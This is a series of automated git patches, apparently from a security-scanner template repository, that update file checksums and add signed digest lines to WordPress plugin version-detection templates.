-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:c4a6d4a26751a0f0cc9b112b6f8f52dc350dd9a0 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:2b29ec490d95ce80f70bedbd9cbb8c9632a4e811 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:ebc72f277dea2ae763c6d841f79a9ce551d2f707 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1a7f197c623a0a0c9ed9b7d8339e309959b3517c +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:b18acc3af73002b20c5eddf4b2d3590eb22667d5 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:6589a69ae293c750d836223515d4c38179901336 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:532ac6956ef804d95d4e5a525e55c05e91135374 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f52ce8fa8643bad9b3a4bed9d754d8de38f21db4 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:28d01ad5fef488960b3e7caf34d81c1f9e9d3276 -http/technologies/wordpress/plugins/woocommerce-services.yaml:f41b52ab1982d2bea2bd2b2a87b41ea592bb635e -http/technologies/wordpress/plugins/woocommerce.yaml:e67a9434b700be7a81ea9962be2fab6ae8f0bf6a -http/technologies/wordpress/plugins/wordfence.yaml:3165603ac638ec0f6873f656a7cbd4884ca5e98c -http/technologies/wordpress/plugins/wordpress-importer.yaml:1aa0e4d0ae01fed575365c8684b76656e16aac5c -http/technologies/wordpress/plugins/wordpress-seo.yaml:da6e45749e46f8e80577e44ff53b56381482820b +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:bcafc63b7cb7713ca3215f6e78051ed5d51c7481 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2922be9ba3b2ed2f627ebb609f5a0462988e078d -http/technologies/wordpress/plugins/wp-file-manager.yaml:6c7f28e717789b32703381c86cd9d634b756f4be -http/technologies/wordpress/plugins/wp-google-maps.yaml:d26cbbb7f38c29894dc5cfe8c2ec30dfeaa9acc3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:7af2ab66fd854b245f0fd0a2fe06c5e8a3f9a81f -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:31c8824c8c6fd12a33efe790f40a57a1e887f45c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:3e3c3fdeffe38e053ec9b562c5b05900d1e0d624 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:e8f590dd8506c7b68af56c97233a71479d58a587 -http/technologies/wordpress/plugins/wp-optimize.yaml:ada8eb7e5acca0cebc18c13f48a02051fb5d10fb -http/technologies/wordpress/plugins/wp-pagenavi.yaml:be9fc03fa7189ba7686ae14a601de6860a84be8d -http/technologies/wordpress/plugins/wp-reset.yaml:3f442033ca42d4702a5b2fcc294215b331cae50d -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6ab72aeb74671333cfcfaee850d17ca970377424 -http/technologies/wordpress/plugins/wp-rollback.yaml:edbecc16de327ff71dec987c826a6d0c2aeebbaf -http/technologies/wordpress/plugins/wp-seopress.yaml:4415df9803b896355b3c543a05d26daedc647a2c -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:fcfaf9cfd3379e4cc5f8df4d7bd23a94e3fa2bc3 -http/technologies/wordpress/plugins/wp-smushit.yaml:6f3d5602579b5fa837430c255200eaf22ee2bd2e -http/technologies/wordpress/plugins/wp-statistics.yaml:c5ff8a9260bf087f1a7423a6254308caf3466efa -http/technologies/wordpress/plugins/wp-super-cache.yaml:b97164d2dfacb5bf863f4d8435f937553250095e +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 +http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:2a0836a4a96a32f47d24b81296267e59394c1a17 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3b6a6cc314d0ca87744f33034d98a0c7bedcd28d -http/technologies/wordpress/plugins/wpforms-lite.yaml:eed69b2cfde3353a7aa593ed243c6335f5208be3 -http/technologies/wordpress/plugins/wps-hide-login.yaml:66466bb1fc02ad143e2c0ba0658de60cba5147fb -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4d5a4e881e41fd7d88c97cdbe7bd2c783d73226c +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:390201cca7dd9cf602ab91c37c43371a4fe2bd99 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8540,7 +8540,7 @@ javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31 javascript/detection/samba-detect.yaml:542324589cb7b9d34305c339d12350105050f250 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:138f2fd977904d9c0b0ba4417077563babf22fbc -javascript/enumeration/minecraft-enum.yaml:a95ae66cf7f641156f4430c40aa85928ce3559fc +javascript/enumeration/minecraft-enum.yaml:952a3f7820b6193bc91961ff9db403644a5faa7f javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8718,20 +8718,20 @@ network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 -profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 -profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc -profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e -profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 -profiles/cves.yml:7329a9286f8a79e7caeb008a83003d3714e3141b -profiles/default-login.yml:4f58d7f7dcce8c8206816b835cf576a9c7af6d1a -profiles/kev.yml:d2a9c9f9667ae3ae7564df6c766db9def45de916 -profiles/misconfigurations.yml:e755a0f2b337b1b383f027ac5265ebc2799d5e1d -profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 +profiles/all.yml:ad3168415c8c0feaf46c6425a78546b98c3db879 +profiles/aws-cloud-config.yml:703776ad65e5371e9edc50829b733fef84feb47a +profiles/cloud.yml:3133844636ed8272a455c69b86bb7b6bc6f02af7 +profiles/compliance.yml:2a4e9c29796e498b4a9129572bd57f8652fe2c0c +profiles/cves.yml:2c2976ffcead9f014a5933dd6718f4e7ef4a74c2 +profiles/default-login.yml:f10a424c61d9a1d411229bc2e35f2bdb2650bedf +profiles/kev.yml:f4fadde36adee86e24778fd0bd00fbcb49a30a4b +profiles/misconfigurations.yml:586c1e221434a7afe5295c6e45473cab80632b2d +profiles/osint.yml:e2c01c742d5d7bf7ac3599a7c29afdb5dd1c6d90 profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 -profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8 +profiles/wordpress.yml:1ba00c9d00e50671e20f22bd6ec414246af67d06 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521 @@ -8761,7 +8761,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6ed577d2c4a74d9cab921a1814059b33f5114009 +templates-checksum.txt:22fb37496d656830901f2a5ae4123a89fa110eee wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1ba4ee523b126cf6c6615c5fbd5420f94dea9a4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:41:49 +0000 Subject: [PATCH 0566/1841] Auto Generated Templates Checksum [Tue Jun 25 07:41:49 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2abe9125e6..0d8b295b2f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4053,7 +4053,7 @@ http/exposed-panels/hybris-administration-console.yaml:8d1adf2e6db0850a4ade10c81 http/exposed-panels/hydra-dashboard.yaml:747dde0b956be869e2996cbf705992dd962f486f http/exposed-panels/hypertest-dashboard.yaml:8a170a6a223250686c8ca1df2499770c448f1f8e http/exposed-panels/i-mscp-panel.yaml:049d48ab1b7614f1e5b08017b97fa60bce0f3a52 -http/exposed-panels/ibm/ibm-advanced-system-management.yaml:fd306898b10a9986f447dce9e8f4a20bfe5b1f29 +http/exposed-panels/ibm/ibm-advanced-system-management.yaml:7bd36cf919da248d98e1b8ce7d87cbe83243f502 http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a769639 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e http/exposed-panels/ibm/ibm-maximo-login.yaml:5dce11ac4ba10a7c2b8193a6b5f9879740475f79 @@ -8761,7 +8761,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:22fb37496d656830901f2a5ae4123a89fa110eee +templates-checksum.txt:4969e6d6ee33f3abd83bbd608bb8181bc3154705 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6176f74dc42899c1f16ec6e95ebdeca7bcd86908 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:42:49 +0000 Subject: [PATCH 0568/1841] Auto Template Signing [Tue Jun 25 07:42:49 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + javascript/enumeration/minecraft-enum.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..65d61e1432 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d52c6308e9dd15aa4681d4014dc5f311313813bc6e03a39760d845e641a485102210085ddd49549589e274f5d2ee4b1472cce518aaa6c9e9395e88646b2000bac1ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..f6c7255248 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 